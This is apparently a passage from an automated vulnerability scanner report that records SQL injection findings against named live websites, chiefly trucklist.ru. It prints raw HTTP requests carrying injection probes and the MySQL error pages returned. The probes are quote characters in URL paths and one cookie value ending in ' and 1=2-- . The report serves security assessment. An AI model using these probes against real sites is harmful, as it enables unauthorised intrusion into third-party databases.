       
           
           j(this).addClass('selected');

           
           
           j('.visible').fadeOut(speed,function(){
               j(this).removeClass('visible');
               j('#'+tab).fadeIn(speed);
               j('#'+tab).addClass('visible');
               SetCookie('tab', selectedTab,-1);
               SetCookie('tab', clicked,1);
           });
           
           return false;
       });
       
   });
</script>
<style type="text/css" media="all">
   div.hidden{
       display:none;
   }
   div.visible{
       display: block;
   }
   
   div.page_banner{
       width: 980px;
       float: left;
   }
   
   div#bannerWrapper {
       width: 1960px;
       position: absolute;
       left: 0;
   }
   
   
</style>
<div style="width: 980px; overflow: hidden; height: 250px;">
   <div id="bannerWrapper" >
       <div class="page_banner" id="img_tab0">
            <a href="/us/home/smart-security"><div style="display:block; position: absolute; height: 250px; width: 980px;"></div></a>
   <h1>
       <div style="background-image:url(/us/images/banners/banner_home_ecs_pc.jpg); width:980px; height:250px;">
       <div style="position:absolute; top:127px; left: 433px">
                               <a href="/us/home/smart-security" ><img src="/us/images/sub_banner_button_buy.jpg" alt="Buy ESET Smart Security 4" style="margin-right:10px" /></a>
       
...[SNIP]...

Request 2

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6'%20and%201%3d2--%20; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=p3m54lfgguit56nu0eqstd1vf5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 15:15:11 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26683
Date: Mon, 25 Apr 2011 15:15:11 GMT
X-Varnish: 555648227
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
e+"="+escape(cookieValue)
    + ";expires="+expire.toGMTString();
   }

   var speed = 'fast';
   
   var j = jQuery.noConflict();
   var selectedTab = 0;
   j(document).ready(function(){
       j("#tab"+selectedTab).show();
       j("#tab"+selectedTab).addClass('visible');        
       j("#link_tab"+selectedTab).addClass('selected');
       j("#bannerWrapper").css({'left': '-'+(980*selectedTab)+'px'});
       
       j(".clicker").live('click',function(){
           var linkId = j(this).attr('id').split('_');
           var tab = linkId[1];
           var indx = null;
           j('.clicker').each(function(){
               if(j(this).hasClass('selected'))
               {
                   
                   indx = j(this).attr('id').split('_');
                   j(this).removeClass('selected');
               }
           });
           
           indexNum = indx[1].replace(/[^\d]+/i,'');
           var clicked = tab.replace(/[^\d]+/i,'');

           var diff = clicked-indexNum;
           
           j('#bannerWrapper').animate({"left":"-="+(980*diff)},speed);
       
           
           j(this).addClass('selected');

           
           
           j('.visible').fadeOut(speed,function(){
               j(this).removeClass('visible');
               j('#'+tab).fadeIn(speed);
               j('#'+tab).addClass('visible');
               SetCookie('tab', selectedTab,-1);
               SetCookie('tab', clicked,1);
           });
           
           return false;
       });
       
   });
</script>
<style type="text/css" media="all">
   div.hidden{
       display:none;
   }
   div.visible{
       display: block;
   }
   
   div.page_banner{
       width: 980px;
       float: left;
   }
   
   div#bannerWrapper {
       width: 1960px;
       position: absolute;
       left: 0;
   }
   
   
</style>
<div style="width: 980px; overflow: hidden; height: 250px;">
   <div id="bannerWrapper">
       <div class="page_banner" id="img_tab0">
            <a href="/us/home/smart-security"><div style="display:block; position: absolute; height: 250px; width: 980px;"></div></a>
   <h1>
       <div style="background-image:url(/us/images/banners/banner_home_ecs_pc.jpg); width:980px; height:250px;">
       <div style="position:absolute; top:127px; left: 433px">
                               <a href="/us/home/smart-security" ><img src="/us/images/sub_banner_button_buy.jpg" alt="Buy ESET Smart Security 4" style="margin-right:10px" /></a>
                       
...[SNIP]...

1.6. http://www.trucklist.ru/cars/undefined [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/undefined

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /cars'/undefined HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:45:31 GMT
Content-Length: 6600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /cars''/undefined HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:00:18 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.7. http://www.trucklist.ru/cars/undefined [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/undefined

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /cars/undefined' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:02:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:02:39 GMT
Content-Length: 6600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /cars/undefined'' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:02:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:48:03 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.8. http://www.trucklist.ru/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /favicon.ico' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:00:05 GMT
Content-Length: 6594

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.9. http://www.trucklist.ru/plugins/ajax/enums.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /plugins/ajax/enums.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

POST /plugins/ajax/enums.php' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
Origin: http://www.trucklist.ru
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30
Content-Length: 19

name=truck_make_&_=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:49:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:49:45 GMT
Content-Length: 6616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.10. http://www.trucklist.ru/plugins/ajax/enums.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /plugins/ajax/enums.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

POST /plugins/ajax/enums.php/1' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
Origin: http://www.trucklist.ru
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30
Content-Length: 19

name=truck_make_&_=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:48:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:33:25 GMT
Content-Length: 6620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.11. http://www.trucklist.ru/vendors/calendar/super_calendar.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /vendors/calendar/super_calendar.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /vendors/calendar/super_calendar.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:47:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:52 GMT
Content-Length: 6640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.12. http://www.trucklist.ru/webroot/delivery/css/global.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/css/global.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/css/global.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:13 GMT
Content-Length: 6634

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/css/global.css''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:25 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.13. http://www.trucklist.ru/webroot/delivery/js/global.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/global.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/global.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:47:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:47:36 GMT
Content-Length: 6630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.14. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/jquery.cookie.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/jquery.cookie.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
